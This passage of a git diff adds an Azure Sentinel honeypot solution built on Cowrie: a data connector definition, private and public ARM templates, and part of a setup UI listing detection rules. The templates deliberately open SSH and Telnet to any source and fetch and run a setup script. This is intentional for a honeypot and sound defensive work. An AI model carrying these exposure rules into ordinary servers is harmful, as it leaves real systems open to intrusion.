deploy this as a internal / private sensor (HoneyPot) on your existing virtual netwrk and subnet acting as a tripwire and can use the detection rules. Alternatively you can deploy sensor (HoneyPot) publically on the Internet and collect threat inetellegnce. This connector provides Microsoft Sentinel the capability to view dashboards, create custom alerts, collect Threat Intellegence.", + "additionalRequirementBanner": "This data connector depends on a parser based on Kusto Function to work as expected. Follow the steps to use this Kusto Function alias **** in queries and workbooks. [Follow steps to get this Kusto Function>]() ", + "graphQueries": [ + { + "metricName": "Total data received", + "legend": "newCowrie_CL", + "baseQuery": "newCowrie_CL" + } + ], + "sampleQueries": [ + { + "description" : "Top 10 Cowrie Events detected", + "query": "newCowrie_CL\n | extend Message = tostring(parse_json(RawData).message)\n | summarize count() by Message\n | top 10 by count_" + } + ], + "dataTypes": [ + { + "name": "newCowrie_CL", + "lastDataReceivedQuery": "newCowrie_CL\n | summarize Time = max(TimeGenerated)\n | where isnotempty(Time)" + } + ], + "connectivityCriterias": [ + { + "type": "IsConnectedQuery", + "value": [ + "newCowrie_CL\n | summarize LastLogReceived = max(TimeGenerated)\n | project IsConnected = LastLogReceived > ago(30d)" + ] + } + ], + "availability": { + "status": 1, + "isPreview": true + }, + "permissions": { + "resourceProvider": [ + { + "provider": "Microsoft.OperationalInsights/workspaces", + "permissionsDisplayText": "read and write permissions on the workspace are required.", + "providerDisplayName": "Workspace", + "scope": "Workspace", + "requiredPermissions": { + "write": true, + "read": true, + "delete": true + } + }, + { + "provider": "Microsoft.OperationalInsights/workspaces/sharedKeys", + "permissionsDisplayText": "read permissions to shared keys for the workspace are required. [See the documentation to learn more about workspace keys](https://docs.microsoft.com/azure/azure-monitor/platform/agent-windows#obtain-workspace-id-and-key).", + "providerDisplayName": "Keys", + "scope": "Workspace", + "requiredPermissions": { + "action": true + } + } + ], + "customs": [ + { + "name": "Microsoft.Web/sites permissions", + "description": "Read and write permissions to Azure Functions to create a Function App is required. [See the documentation to learn more about Azure Functions](https://docs.microsoft.com/azure/azure-functions/)." + }, + { + "name": "Custom prerequisites if necessary, otherwise delete this customs tag", + "description": "Description for any custom pre-requisites" + } + ] + }, + "instructionSteps": [ + { + "title": "", + "description": ">**NOTE:** This connector deploys a Debian Azure VM, Cowrie software, CustomTable, AMA, DCR, DCE, uses AMA to pull Cowrie JSON logs into Microsoft Sentinel. This might result in additional data ingestion costs." + }, + { + "title": "Option 1 - Private - Azure Resource Manager (ARM) Template", + "description": "Use this method for automated deployment of the Cowrie VM using an ARM Tempate.\n\n1. Click the **Deploy to Azure** button below. \n\n\t[![Deploy To Azure](https://aka.ms/deploytoazurebutton)](https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Solutions/Sensor%2520SSH%2520Cowrie/Package/azuredeployprivate.json)\n2. Mark the checkbox labeled **I agree to the terms and conditions stated above**. \n3. Click **Purchase** to deploy." + }, + { + "title": "Option 2 - Public - Azure Resource Manager (ARM) Template", + "description": "Use this method for automated deployment of the Cowrie VM using an ARM Tempate.\n\n1. Click the **Deploy to Azure** button below. \n\n\t[![Deploy To Azure](https://aka.ms/deploytoazurebutton)](https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Solutions/Sensor%2520SSH%2520Cowrie/Package/azuredeploypublic.json)\n2. Mark the checkbox labeled **I agree to the terms and conditions stated above**. \n3. Click **Purchase** to deploy." + }, + { + "title": "", + "description": "**Post Deployment**\n\n1. From the Azure Portal, navigate to the data collection rule cowrie-dcr, click on resources, you will see your VM with a data collection rule associated, Next you must associate Data Collection Endpoint (DCE) cowrie-dce and press Save." + } + ], + "metadata": { + "id": "d4a44059-a0d1-4e76-a8c5-535d381c0872", + "version": "1.0.0", + "kind": "dataConnector", + "source": { + "kind": "Solution", + "name": "Sensore SSH Cowrie" + }, + "author": { + "name": "Microsoft" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + } + } +} \ No newline at end of file diff --git a/Solutions/Sensor SSH Cowrie/Package/azuredeployprivate.json b/Solutions/Sensor SSH Cowrie/Package/azuredeployprivate.json new file mode 100644 index 00000000000..a681c653e85 --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/Package/azuredeployprivate.json @@ -0,0 +1,439 @@ +{ + "$schema": "https://schema.management.azure.com/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "adminUsername": { + "type": "String", + "metadata": { + "description": "Admin username for the VM" + } + }, + "adminPassword": { + "type": "SecureString", + "metadata": { + "description": "Admin password for the VM" + } + }, + "vmName": { + "defaultValue": "bastion-01", + "type": "String", + "metadata": { + "description": "Name of the virtual machine, bastion-01, cups-01, customerland-lamp-01" + } + }, + "virtualNetworkName": { + "type": "string", + "defaultValue": "VNETNAME", + "metadata": { + "description": "Name of the existing VNET" + } + }, + "virtualNetworkResourceGroup": { + "type": "string", + "defaultValue": "VNETRESOURCEGROUPNAME", + "metadata": { + "description": "Name of the existing VNET resource group" + } + }, + "subnetName": { + "type": "string", + "defaultValue": "SUBNETNAME", + "metadata": { + "description": "Name of the subnet in the virtual network you want to use" + } + }, + "IpMgmtAllow": { + "defaultValue": "xx.xx.xx.xx/32", + "type": "String", + "metadata": { + "description": "The Ip Address that is allowed to connect over port 22222 SSH Mgmt Plane" + } + }, + "resourceGroupNameofWorkspace": { + "defaultValue": "RGNAMEFORLOGANALYTICSWORKSPACE", + "type": "String", + "metadata": { + "description": "The Azure ResourceGroup name of the existing Sentinel or Log Analytics workspace" + } + }, + "SubscriptionIDofWorkspace": { + "defaultValue": "AZURESUBGUIDFORLOGANALYTICSWORKSPACE", + "type": "String", + "metadata": { + "description": "The Azure SubscriptionID of the existing Sentinel or Log Analytics workspace" + } + }, + "workspaceName": { + "defaultValue": "NAMEOFLOGANALYTICSWORKSPACE", + "type": "String", + "metadata": { + "description": "The Sentinel or Log Analytics workspace name" + } + }, + "customTableName": { + "defaultValue": "newCowrie_CL", + "type": "String", + "metadata": { + "description": "Name of the custom table for Honeypot events" + } + }, + "scriptUrl": { + "defaultValue": "https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Solutions/Sensor%2520SSH%2520Cowrie/Scripts/script.sh", + "type": "String", + "metadata": { + "description": "URL of script to execute" + } + }, + "scriptFileName": { + "defaultValue": "script.sh", + "type": "String", + "metadata": { + "description": "Name of script to execute" + } + } + }, + "variables": { + "location": "[resourceGroup().location]", + "workspaceId": "[resourceId(parameters('resourceGroupNameofWorkspace'), 'Microsoft.OperationalInsights/workspaces', parameters('workspaceName'))]", + "subnetRef": "[resourceId(parameters('virtualNetworkResourceGroup'), 'Microsoft.Network/virtualNetworks/subnets', parameters('virtualNetworkName'), parameters('subnetName'))]", + "dcrName": "cowrie-dcr", + "dceName": "cowrie-dce", + "vmSize": "Standard_D2s_v3", + "imagePublisher": "Debian", + "imageOffer": "debian-11", + "imageSku": "11-gen2", + "nicName": "[concat(parameters('vmName'), '-nic')]", + "osDiskName": "[concat(parameters('vmName'), '-osDisk')]" + }, + "resources": [ + { + "type": "Microsoft.Network/networkSecurityGroups", + "apiVersion": "2020-11-01", + "name": "myNSG", + "location": "[resourceGroup().location]", + "properties": { + "securityRules": [ + { + "name": "AllowSSH", + "properties": { + "protocol": "Tcp", + "sourcePortRange": "*", + "destinationPortRange": "22", + "sourceAddressPrefix": "*", + "destinationAddressPrefix": "*", + "access": "Allow", + "priority": 1000, + "direction": "Inbound" + } + }, + { + "name": "AllowTelnet", + "properties": { + "protocol": "Tcp", + "sourcePortRange": "*", + "destinationPortRange": "23", + "sourceAddressPrefix": "*", + "destinationAddressPrefix": "*", + "access": "Allow", + "priority": 1010, + "direction": "Inbound" + } + }, + { + "name": "AllowTagCustom22222Inbound", + "properties": { + "protocol": "Tcp", + "sourcePortRange": "*", + "destinationPortRange": "22222", + "sourceAddressPrefix": "AzureCloud", + "destinationAddressPrefix": "*", + "access": "Allow", + "priority": 1020, + "direction": "Inbound" + } + }, + { + "name": "AllowCidrBlockCustom22222Inbound", + "properties": { + "protocol": "Tcp", + "sourcePortRange": "*", + "destinationPortRange": "22222", + "sourceAddressPrefix": "[parameters('IpMgmtAllow')]", + "destinationAddressPrefix": "*", + "access": "Allow", + "priority": 1030, + "direction": "Inbound", + "sourcePortRanges": [], + "destinationPortRanges": [], + "sourceAddressPrefixes": [], + "destinationAddressPrefixes": [] + } + } + ] + } + }, + { + "type": "Microsoft.Network/networkInterfaces", + "apiVersion": "2021-05-01", + "name": "[variables('nicName')]", + "location": "[variables('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/networkSecurityGroups', 'myNSG')]" + ], + "properties": { + "ipConfigurations": [ + { + "name": "ipconfig1", + "properties": { + "privateIPAllocationMethod": "Dynamic", + "subnet": { + "id": "[variables('subnetRef')]" + } + } + } + ], + "networkSecurityGroup": { + "id": "[resourceId('Microsoft.Network/networkSecurityGroups', 'myNSG')]" + } + } + }, + { + "type": "Microsoft.Compute/virtualMachines", + "apiVersion": "2021-07-01", + "name": "[parameters('vmName')]", + "location": "[variables('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/networkInterfaces', variables('nicName'))]" + ], + "properties": { + "hardwareProfile": { + "vmSize": "[variables('vmSize')]" + }, + "storageProfile": { + "imageReference": { + "publisher": "[variables('imagePublisher')]", + "offer": "[variables('imageOffer')]", + "sku": "[variables('imageSku')]", + "version": "latest" + }, + "osDisk": { + "createOption": "FromImage", + "managedDisk": { + "storageAccountType": "Standard_LRS" + } + } + }, + "osProfile": { + "computerName": "[parameters('vmName')]", + "adminUsername": "[parameters('adminUsername')]", + "adminPassword": "[parameters('adminPassword')]" + }, + "networkProfile": { + "networkInterfaces": [ + { + "id": "[resourceId('Microsoft.Network/networkInterfaces', variables('nicName'))]" + } + ] + } + } + }, + { + "type": "Microsoft.Compute/virtualMachines/extensions", + "apiVersion": "2021-11-01", + "name": "[format('{0}/AzureMonitorLinuxAgent', parameters('vmName'))]", + "location": "[resourceGroup().location]", + "dependsOn": [ + "[resourceId('Microsoft.Compute/virtualMachines', parameters('vmName'))]" + ], + "properties": { + "publisher": "Microsoft.Azure.Monitor", + "type": "AzureMonitorLinuxAgent", + "typeHandlerVersion": "1.21", + "autoUpgradeMinorVersion": true, + "enableAutomaticUpgrade": true + } + }, + { + "type": "Microsoft.Compute/virtualMachines/extensions", + "apiVersion": "2021-03-01", + "name": "[concat(parameters('vmName'), '/customScriptExtension')]", + "location": "[resourceGroup().location]", + "dependsOn": [ + "[resourceId('Microsoft.Compute/virtualMachines', parameters('vmName'))]" + ], + "properties": { + "publisher": "Microsoft.Azure.Extensions", + "type": "CustomScript", + "typeHandlerVersion": "2.1", + "autoUpgradeMinorVersion": true, + "settings": { + "fileUris": [ + "[parameters('scriptUrl')]" + ], + "commandToExecute": "[concat('bash ', parameters('scriptFileName'))]" + } + } + }, + { + "type": "Microsoft.Resources/deployments", + "apiVersion": "2021-04-01", + "name": "nestedTemplate", + "resourceGroup": "[parameters('resourceGroupNameofWorkspace')]", + "subscriptionId": "[parameters('SubscriptionIDofWorkspace')]", + "properties": { + "mode": "Incremental", + "template": { + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": {}, + "variables": {}, + "resources": [ + { + "type": "Microsoft.OperationalInsights/workspaces/tables", + "apiVersion": "2022-10-01", + "name": "[concat(parameters('workspaceName'), '/', parameters('customTableName'))]", + "properties": { + "schema": { + "name": "[parameters('customTableName')]", + "columns": [ + { + "name": "TimeGenerated", + "type": "datetime" + }, + { + "name": "Timestamp", + "type": "datetime" + }, + { + "name": "RawData", + "type": "string" + }, + { + "name": "Message", + "type": "string" + }, + { + "name": "Severity", + "type": "string" + } + ], + "primaryKey": [ + "TimeGenerated" + ] + } + } + } + ] + }, + "parameters": {} + } + }, + { + "type": "Microsoft.Insights/dataCollectionEndpoints", + "apiVersion": "2023-03-11", + "name": "cowrie-dce", + "location": "[resourceGroup().location]", + "properties": { + "immutableId": "", + "configurationAccess": {}, + "logsIngestion": {}, + "metricsIngestion": {}, + "networkAcls": { + "publicNetworkAccess": "Enabled" + } + } + }, + { + "type": "Microsoft.Insights/dataCollectionRules", + "dependsOn": [ + "[resourceId('Microsoft.Insights/dataCollectionEndpoints', 'cowrie-dce')]" + ], + "apiVersion": "2022-06-01", + "name": "cowrie-dcr", + "location": "[resourceGroup().location]", + "identity": { + "type": "systemAssigned" + }, + "properties": { + "dataCollectionEndpointId": "[resourceId('Microsoft.Insights/dataCollectionEndpoints', 'cowrie-dce')]", + "dataFlows": [ + { + "destinations": [ + "MyDestination" + ], + "outputStream": "[concat('Custom-', parameters('customTableName'))]", + "streams": [ + "Custom-Text-cowrie_CL" + ], + "transformKql": "source" + } + ], + "dataSources": { + "logFiles": [ + { + "filePatterns": [ + "/home/cowrie/cowrie/var/log/cowrie/cowrie.json" + ], + "format": "text", + "name": "Custom-Text-cowrie_CL", + "settings": { + "text": { + "recordStartTimestampFormat": "ISO 8601" + } + }, + "streams": [ + "Custom-Text-cowrie_CL" + ] + } + ] + }, + "destinations": { + "logAnalytics": [ + { + "name": "MyDestination", + "workspaceResourceId": "[variables('workspaceId')]" + } + ] + }, + "streamDeclarations": { + "Custom-Text-cowrie_CL": { + "columns": [ + { + "name": "TimeGenerated", + "type": "datetime" + }, + { + "name": "Message", + "type": "string" + }, + { + "name": "RawData", + "type": "string" + } + ] + } + } + } + }, + { + "type": "Microsoft.Insights/dataCollectionRuleAssociations", + "dependsOn": [ + "[resourceId('Microsoft.Insights/dataCollectionRules', variables('dcrName'))]", + "[resourceId('Microsoft.Compute/virtualMachines', parameters('vmName'))]" + ], + "apiVersion": "2023-03-11", + "scope": "[resourceId('Microsoft.Compute/virtualMachines', parameters('vmName'))]", + "name": "cowrie-dcr-assoc", + "location": "[resourceGroup().location]", + "properties": { + "dataCollectionRuleId": "[resourceId('Microsoft.Insights/dataCollectionRules', variables('dcrName'))]" + } + } + ], + "outputs": { + "adminUsername": { + "type": "String", + "value": "[parameters('adminUsername')]" + } + } + } \ No newline at end of file diff --git a/Solutions/Sensor SSH Cowrie/Package/azuredeploypublic.json b/Solutions/Sensor SSH Cowrie/Package/azuredeploypublic.json new file mode 100644 index 00000000000..659e5484bea --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/Package/azuredeploypublic.json @@ -0,0 +1,454 @@ +{ + "$schema": "https://schema.management.azure.com/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "adminUsername": { + "type": "String", + "metadata": { + "description": "Admin username for the VM" + } + }, + "adminPassword": { + "type": "SecureString", + "metadata": { + "description": "Admin password for the VM" + } + }, + "vmName": { + "defaultValue": "bastion-01", + "type": "String", + "metadata": { + "description": "Name of the virtual machine, bastion-01, cups-01, customerland-lamp-01" + } + }, + "IpMgmtAllow": { + "defaultValue": "xx.xx.xx.xx/32", + "type": "String", + "metadata": { + "description": "The Ip Address that is allowed to connect over port 22222 SSH Mgmt Plane" + } + }, + "resourceGroupNameofWorkspace": { + "defaultValue": "RGNAMEFORLOGANALYTICSWORKSPACE", + "type": "String", + "metadata": { + "description": "The Azure ResourceGroup name of the existing Sentinel or Log Analytics workspace" + } + }, + "SubscriptionIDofWorkspace": { + "defaultValue": "AZURESUBGUIDFORLOGANALYTICSWORKSPACE", + "type": "String", + "metadata": { + "description": "The Azure SubscriptionID of the existing Sentinel or Log Analytics workspace" + } + }, + "workspaceName": { + "defaultValue": "NAMEOFLOGANALYTICSWORKSPACE", + "type": "String", + "metadata": { + "description": "The Sentinel or Log Analytics workspace name" + } + }, + "customTableName": { + "defaultValue": "newCowrie_CL", + "type": "String", + "metadata": { + "description": "Name of the custom table for Honeypot events" + } + }, + "scriptUrl": { + "defaultValue": "https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Solutions/Sensor%2520SSH%2520Cowrie/Scripts/script.sh", + "type": "String", + "metadata": { + "description": "URL of script to execute" + } + }, + "scriptFileName": { + "defaultValue": "script.sh", + "type": "String", + "metadata": { + "description": "Name of script to execute" + } + } + }, + "variables": { + "location": "[resourceGroup().location]", + "workspaceId": "[resourceId(parameters('resourceGroupNameofWorkspace'), 'Microsoft.OperationalInsights/workspaces', parameters('workspaceName'))]", + "vmSize": "Standard_D2s_v3", + "imagePublisher": "Debian", + "imageOffer": "debian-11", + "imageSku": "11-gen2", + "dcrName": "cowrie-dcr", + "dceName": "cowrie-dce", + "vnetName": "VNET-Sensor", + "subnetName": "default", + "nicName": "[concat(parameters('vmName'), '-nic')]", + "publicIPName": "[concat(parameters('vmName'), '-publicIP')]", + "osDiskName": "[concat(parameters('vmName'), '-osDisk')]" + }, + "resources": [ + { + "type": "Microsoft.Network/publicIPAddresses", + "apiVersion": "2021-05-01", + "name": "[variables('publicIPName')]", + "location": "[variables('location')]", + "properties": { + "publicIPAllocationMethod": "Dynamic" + } + }, + { + "type": "Microsoft.Network/networkSecurityGroups", + "apiVersion": "2020-11-01", + "name": "myNSG", + "location": "[resourceGroup().location]", + "properties": { + "securityRules": [ + { + "name": "AllowSSH", + "properties": { + "protocol": "Tcp", + "sourcePortRange": "*", + "destinationPortRange": "22", + "sourceAddressPrefix": "*", + "destinationAddressPrefix": "*", + "access": "Allow", + "priority": 1000, + "direction": "Inbound" + } + }, + { + "name": "AllowTelnet", + "properties": { + "protocol": "Tcp", + "sourcePortRange": "*", + "destinationPortRange": "23", + "sourceAddressPrefix": "*", + "destinationAddressPrefix": "*", + "access": "Allow", + "priority": 1010, + "direction": "Inbound" + } + }, + { + "name": "AllowTagCustom22222Inbound", + "properties": { + "protocol": "Tcp", + "sourcePortRange": "*", + "destinationPortRange": "22222", + "sourceAddressPrefix": "AzureCloud", + "destinationAddressPrefix": "*", + "access": "Allow", + "priority": 1020, + "direction": "Inbound" + } + }, + { + "name": "AllowCidrBlockCustom22222Inbound", + "properties": { + "protocol": "Tcp", + "sourcePortRange": "*", + "destinationPortRange": "22222", + "sourceAddressPrefix": "[parameters('IpMgmtAllow')]", + "destinationAddressPrefix": "*", + "access": "Allow", + "priority": 1030, + "direction": "Inbound", + "sourcePortRanges": [], + "destinationPortRanges": [], + "sourceAddressPrefixes": [], + "destinationAddressPrefixes": [] + } + } + ] + } + }, + { + "type": "Microsoft.Network/virtualNetworks", + "apiVersion": "2021-05-01", + "name": "[variables('vnetName')]", + "location": "[variables('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "10.0.0.0/16" + ] + }, + "subnets": [ + { + "name": "[variables('subnetName')]", + "properties": { + "addressPrefix": "10.0.0.0/24" + } + } + ] + } + }, + { + "type": "Microsoft.Network/networkInterfaces", + "apiVersion": "2021-05-01", + "name": "[variables('nicName')]", + "location": "[variables('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks', variables('vnetName'))]", + "[resourceId('Microsoft.Network/networkSecurityGroups', 'myNSG')]" + ], + "properties": { + "ipConfigurations": [ + { + "name": "ipconfig1", + "properties": { + "privateIPAllocationMethod": "Dynamic", + "subnet": { + "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('vnetName'), variables('subnetName'))]" + }, + "publicIPAddress": { + "id": "[resourceId('Microsoft.Network/publicIPAddresses', variables('publicIPName'))]" + } + } + } + ], + "networkSecurityGroup": { + "id": "[resourceId('Microsoft.Network/networkSecurityGroups', 'myNSG')]" + } + } + }, + { + "type": "Microsoft.Compute/virtualMachines", + "apiVersion": "2021-07-01", + "name": "[parameters('vmName')]", + "location": "[variables('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/networkInterfaces', variables('nicName'))]" + ], + "properties": { + "hardwareProfile": { + "vmSize": "[variables('vmSize')]" + }, + "storageProfile": { + "imageReference": { + "publisher": "[variables('imagePublisher')]", + "offer": "[variables('imageOffer')]", + "sku": "[variables('imageSku')]", + "version": "latest" + }, + "osDisk": { + "createOption": "FromImage", + "managedDisk": { + "storageAccountType": "Standard_LRS" + } + } + }, + "osProfile": { + "computerName": "[parameters('vmName')]", + "adminUsername": "[parameters('adminUsername')]", + "adminPassword": "[parameters('adminPassword')]" + }, + "networkProfile": { + "networkInterfaces": [ + { + "id": "[resourceId('Microsoft.Network/networkInterfaces', variables('nicName'))]" + } + ] + } + } + }, + { + "type": "Microsoft.Compute/virtualMachines/extensions", + "apiVersion": "2021-11-01", + "name": "[format('{0}/AzureMonitorLinuxAgent', parameters('vmName'))]", + "location": "[resourceGroup().location]", + "dependsOn": [ + "[resourceId('Microsoft.Compute/virtualMachines', parameters('vmName'))]" + ], + "properties": { + "publisher": "Microsoft.Azure.Monitor", + "type": "AzureMonitorLinuxAgent", + "typeHandlerVersion": "1.21", + "autoUpgradeMinorVersion": true, + "enableAutomaticUpgrade": true + } + }, + { + "type": "Microsoft.Compute/virtualMachines/extensions", + "apiVersion": "2021-03-01", + "name": "[concat(parameters('vmName'), '/customScriptExtension')]", + "location": "[resourceGroup().location]", + "dependsOn": [ + "[resourceId('Microsoft.Compute/virtualMachines', parameters('vmName'))]" + ], + "properties": { + "publisher": "Microsoft.Azure.Extensions", + "type": "CustomScript", + "typeHandlerVersion": "2.1", + "autoUpgradeMinorVersion": true, + "settings": { + "fileUris": [ + "[parameters('scriptUrl')]" + ], + "commandToExecute": "[concat('bash ', parameters('scriptFileName'))]" + } + } + }, + { + "type": "Microsoft.Resources/deployments", + "apiVersion": "2021-04-01", + "name": "nestedTemplate", + "resourceGroup": "[parameters('resourceGroupNameofWorkspace')]", + "subscriptionId": "[parameters('SubscriptionIDofWorkspace')]", + "properties": { + "mode": "Incremental", + "template": { + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": {}, + "variables": {}, + "resources": [ + { + "type": "Microsoft.OperationalInsights/workspaces/tables", + "apiVersion": "2022-10-01", + "name": "[concat(parameters('workspaceName'), '/', parameters('customTableName'))]", + "properties": { + "schema": { + "name": "[parameters('customTableName')]", + "columns": [ + { + "name": "TimeGenerated", + "type": "datetime" + }, + { + "name": "Timestamp", + "type": "datetime" + }, + { + "name": "RawData", + "type": "string" + }, + { + "name": "Message", + "type": "string" + }, + { + "name": "Severity", + "type": "string" + } + ], + "primaryKey": [ + "TimeGenerated" + ] + } + } + } + ] + }, + "parameters": {} + } + }, + { + "type": "Microsoft.Insights/dataCollectionEndpoints", + "apiVersion": "2023-03-11", + "name": "cowrie-dce", + "location": "[resourceGroup().location]", + "properties": { + "immutableId": "", + "configurationAccess": {}, + "logsIngestion": {}, + "metricsIngestion": {}, + "networkAcls": { + "publicNetworkAccess": "Enabled" + } + } + }, + { + "type": "Microsoft.Insights/dataCollectionRules", + "dependsOn": [ + "[resourceId('Microsoft.Insights/dataCollectionEndpoints', 'cowrie-dce')]" + ], + "apiVersion": "2022-06-01", + "name": "cowrie-dcr", + "location": "[resourceGroup().location]", + "identity": { + "type": "systemAssigned" + }, + "properties": { + "dataCollectionEndpointId": "[resourceId('Microsoft.Insights/dataCollectionEndpoints', 'cowrie-dce')]", + "dataFlows": [ + { + "destinations": [ + "MyDestination" + ], + "outputStream": "[concat('Custom-', parameters('customTableName'))]", + "streams": [ + "Custom-Text-cowrie_CL" + ], + "transformKql": "source" + } + ], + "dataSources": { + "logFiles": [ + { + "filePatterns": [ + "/home/cowrie/cowrie/var/log/cowrie/cowrie.json" + ], + "format": "text", + "name": "Custom-Text-cowrie_CL", + "settings": { + "text": { + "recordStartTimestampFormat": "ISO 8601" + } + }, + "streams": [ + "Custom-Text-cowrie_CL" + ] + } + ] + }, + "destinations": { + "logAnalytics": [ + { + "name": "MyDestination", + "workspaceResourceId": "[variables('workspaceId')]" + } + ] + }, + "streamDeclarations": { + "Custom-Text-cowrie_CL": { + "columns": [ + { + "name": "TimeGenerated", + "type": "datetime" + }, + { + "name": "Message", + "type": "string" + }, + { + "name": "RawData", + "type": "string" + } + ] + } + } + } + }, + { + "type": "Microsoft.Insights/dataCollectionRuleAssociations", + "dependsOn": [ + "[resourceId('Microsoft.Insights/dataCollectionRules', variables('dcrName'))]", + "[resourceId('Microsoft.Compute/virtualMachines', parameters('vmName'))]" + ], + "apiVersion": "2023-03-11", + "scope": "[resourceId('Microsoft.Compute/virtualMachines', parameters('vmName'))]", + "name": "cowrie-dcr-assoc", + "location": "[resourceGroup().location]", + "properties": { + "dataCollectionRuleId": "[resourceId('Microsoft.Insights/dataCollectionRules', variables('dcrName'))]" + } + } + ], + "outputs": { + "adminUsername": { + "type": "String", + "value": "[parameters('adminUsername')]" + } + } +} \ No newline at end of file diff --git a/Solutions/Sensor SSH Cowrie/Package/createUiDefinition.json b/Solutions/Sensor SSH Cowrie/Package/createUiDefinition.json new file mode 100644 index 00000000000..543134147a7 --- /dev/null +++ b/Solutions/Sensor SSH Cowrie/Package/createUiDefinition.json @@ -0,0 +1,224 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/0.1.2-preview/CreateUIDefinition.MultiVm.json#", + "handler": "Microsoft.Azure.CreateUIDef", + "version": "0.1.2-preview", + "parameters": { + "config": { + "isWizard": false, + "basics": { + "description": "**Note:** Please refer to the following before installing the solution: \n\n• Review the solution [Release Notes](https://github.com/Azure/Azure-Sentinel/tree/master/Solutions/Sensor%20SSH%20Cowrie/ReleaseNotes.md)\n\n • There may be [known issues](https://aka.ms/sentinelsolutionsknownissues) pertaining to this Solution, please refer to them before installing.\n\nThe Sensor SSH Cowrie solution for Microsoft Sentinel enables you to deploy a Azure VM for as a HoneyPot for private internal detection tripwire capabilitties or deploy publicly on the internet for threat intellegence gathering.\r\n\r\n **Underlying Technologies used:** \r\n\r\n This solution takes a dependency on technologies, and some of these dependencies may result in additional ingestion or operational costs.\r\n\na. [Cowrie](https://cowrie.readthedocs.io/en/latest/)\r\n\n\n\n**Data Connectors:** 1, **Workbooks:** 1, **Analytic Rules:** 5\n\n[Learn more about Microsoft Sentinel](https://aka.ms/azuresentinel) | [Learn more about Solutions](https://aka.ms/azuresentinelsolutionsdoc)", + "subscription": { + "resourceProviders": [ + "Microsoft.OperationsManagement/solutions", + "Microsoft.OperationalInsights/workspaces/providers/alertRules", + "Microsoft.Insights/workbooks" + ] + }, + "location": { + "metadata": { + "hidden": "Hiding location, we get it from the log analytics workspace" + }, + "visible": false + }, + "resourceGroup": { + "allowExisting": true + } + } + }, + "basics": [ + { + "name": "getLAWorkspace", + "type": "Microsoft.Solutions.ArmApiControl", + "toolTip": "This filters by workspaces that exist in the Resource Group selected", + "condition": "[greater(length(resourceGroup().name),0)]", + "request": { + "method": "GET", + "path": "[concat(subscription().id,'/providers/Microsoft.OperationalInsights/workspaces?api-version=2020-08-01')]" + } + }, + { + "name": "workspace", + "type": "Microsoft.Common.DropDown", + "label": "Workspace", + "placeholder": "Select a workspace", + "toolTip": "This dropdown will list only workspace that exists in the Resource Group selected", + "constraints": { + "allowedValues": "[map(filter(basics('getLAWorkspace').value, (filter) => contains(toLower(filter.id), toLower(resourceGroup().name))), (item) => parse(concat('{\"label\":\"', item.name, '\",\"value\":\"', item.name, '\"}')))]", + "required": true + }, + "visible": true + } + ], + "steps": [ + { + "name": "dataconnectors", + "label": "Data Connectors", + "bladeTitle": "Data Connectors", + "elements": [ + { + "name": "dataconnectors1-text", + "type": "Microsoft.Common.TextBlock", + "options": { + "text": "This Solution installs the data connector for Sensor SSH Cowrie. You can get Cowrie Events custom log data in your Microsoft Sentinel workspace. After installing the solution, configure and enable this data connector by following guidance in Manage solution view." + } + }, + { + "name": "dataconnectors-link2", + "type": "Microsoft.Common.TextBlock", + "options": { + "link": { + "label": "Learn more about connecting data sources", + "uri": "https://docs.microsoft.com/azure/sentinel/connect-data-sources" + } + } + } + ] + }, + { + "name": "workbooks", + "label": "Workbooks", + "subLabel": { + "preValidation": "Configure the workbooks", + "postValidation": "Done" + }, + "bladeTitle": "Workbooks", + "elements": [ + { + "name": "workbooks-text", + "type": "Microsoft.Common.TextBlock", + "options": { + "text": "This solution installs workbook(s) to help you gain insights into the Cowrie events collected in Microsoft Sentinel. After installing the solution, start using the workbook in Manage solution view." + } + }, + { + "name": "workbooks-link", + "type": "Microsoft.Common.TextBlock", + "options": { + "link": { + "label": "Learn more", + "uri": "https://docs.microsoft.com/azure/sentinel/tutorial-monitor-your-data" + } + } + }, + { + "name": "workbook1", + "type": "Microsoft.Common.Section", + "label": "Cowrie", + "elements": [ + { + "name": "workbook1-text", + "type": "Microsoft.Common.TextBlock", + "options": { + "text": "Gain insight into Cowrie events by analyzing, collecting and correlating Cowrie event data.\nThis workbook provides visibility into cowrie events on the sensor" + } + } + ] + } + ] + }, + { + "name": "analytics", + "label": "Analytics", + "subLabel": { + "preValidation": "Configure the analytics", + "postValidation": "Done" + }, + "bladeTitle": "Analytics", + "elements": [ + { + "name": "analytics-text", + "type": "Microsoft.Common.TextBlock", + "options": { + "text": "This solution installs the following analytic rule templates. After installing the solution, create and enable analytic rules in Manage solution view." + } + }, + { + "name": "analytics-link", + "type": "Microsoft.Common.TextBlock", + "options": { + "link": { + "label": "Learn more", + "uri": "https://docs.microsoft.com/azure/sentinel/tutorial-detect-threats-custom?WT.mc_id=Portal-Microsoft_Azure_CreateUIDef" + } + } + }, + { + "name": "analytic1", + "type": "Microsoft.Common.Section", + "label": "Detect Suspicious File Downloads", + "elements": [ + { + "name": "analytic1-text", + "type": "Microsoft.Common.TextBlock", + "options": { + "text": "This Creates an incident when identifying instances where files were downloaded from suspicious or known malicious URLs." + } + } + ] + }, + { + "name": "analytic2", + "type": "Microsoft.Common.Section", + "label": "Monitor Unusual File Execution", + "elements": [ + { + "name": "analytic2-text", + "type": "Microsoft.Common.TextBlock", + "options": { + "text": "This Creates an incident when identifying 